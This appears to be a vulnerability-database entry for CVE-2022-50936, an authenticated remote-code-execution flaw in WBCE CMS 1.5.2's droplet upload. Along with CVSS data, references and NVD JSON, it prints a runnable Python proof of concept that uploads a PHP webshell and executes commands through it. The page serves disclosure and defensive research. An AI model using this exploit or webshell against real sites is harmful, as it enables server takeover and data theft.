CVE-2022-50936

Description

WBCE CMS version 1.5.2 contains an authenticated remote code execution vulnerability that allows attackers to upload malicious droplets through the admin panel. Authenticated attackers can exploit the droplet upload functionality in the admin tools to create and execute arbitrary PHP code by crafting a specially designed zip file payload.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:wbce:wbce_cms:1.5.2:*:*:*:*:*:*:* - VULNERABLE

WBCE CMS 1.5.2及之前版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import zipfile
import os
import requests

# CVE-2022-50936 PoC - WBCE CMS 1.5.2 Authenticated RCE via Droplet Upload
# Target: WBCE CMS <= 1.5.2
# Attack Type: Remote Code Execution via malicious droplet ZIP upload

TARGET_URL = "http://target-website.com/admin/admintools/tool.php"
LOGIN_URL = "http://target-website.com/admin/login/index.php"
USERNAME = "admin"
PASSWORD = "password"

# Create malicious PHP webshell disguised as droplet
webshell_content = "<?php if(isset($_REQUEST['cmd'])){ system($_REQUEST['cmd']); } ?>"

# Create malicious droplet ZIP file
zip_filename = "malicious_droplet.zip"
with zipfile.ZipFile(zip_filename, 'w') as zf:
    # Droplet files typically need specific naming convention
    zf.writestr("droplet.php", webshell_content)
    zf.writestr("droplet.xml", "<droplet><name>evil</name></droplet>")

# Step 1: Authenticate to get session cookie
session = requests.Session()
login_data = {
    'username': USERNAME,
    'password': PASSWORD,
    'submit': 'Login'
}
resp = session.post(LOGIN_URL, data=login_data)

# Step 2: Upload malicious droplet ZIP via admin tools
files = {'file': open(zip_filename, 'rb')}
upload_data = {
    'tool': 'droplets',
    'action': 'upload'
}
upload_resp = session.post(TARGET_URL, files=files, data=upload_data)

# Step 3: Execute the planted webshell
webshell_url = "http://target-website.com/media/droplets/droplet.php"
cmd_data = {'cmd': 'whoami'}
exec_resp = session.get(webshell_url, params=cmd_data)
print(exec_resp.text)

os.remove(zip_filename)
print("[+] Exploitation completed - RCE achieved")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2022-50936
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2022-50936
[3] CVE Details https://www.cvedetails.com/cve/CVE-2022-50936/
[4] VulDB https://vuldb.com/cve/CVE-2022-50936
[5] https://github.com/WBCE/WBCE_CMS
[6] https://wbce.org/
[7] https://wbce.org/de/downloads/
[8] https://www.exploit-db.com/exploits/50707
[9] https://www.vulncheck.com/advisories/wbce-cms-remote-code-execution-rce-authenticated

Raw JSON Data

JSON

{"cve": {"id": "CVE-2022-50936", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:58.703", "lastModified": "2026-01-20T17:58:42.253", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WBCE CMS version 1.5.2 contains an authenticated remote code execution vulnerability that allows attackers to upload malicious droplets through the admin panel. Authenticated attackers can exploit the droplet upload functionality in the admin tools to create and execute arbitrary PHP code by crafting a specially designed zip file payload."}, {"lang": "es", "value": "WBCE CMS versión 1.5.2 contiene una vulnerabilidad de ejecución remota de código autenticada que permite a los atacantes subir 'droplets' maliciosos a través del panel de administración. Los atacantes autenticados pueden explotar la funcionalidad de subida de 'droplets' en las herramientas de administración para crear y ejecutar código PHP arbitrario mediante la elaboración de una carga útil de archivo zip especialmente diseñada."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wbce:wbce_cms:1.5.2:*:*:*:*:*:*:*", "matchCriteriaId": "96B45806-EBC0-41D2-A686-493ABEBC953D"}]}]}], "references": [{"url": "https://github.com/WBCE/WBCE_CMS", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://wbce.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://wbce.org/de/downloads/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/50707", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/wbce-cms-remote-code-execution-rce-authenticated", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}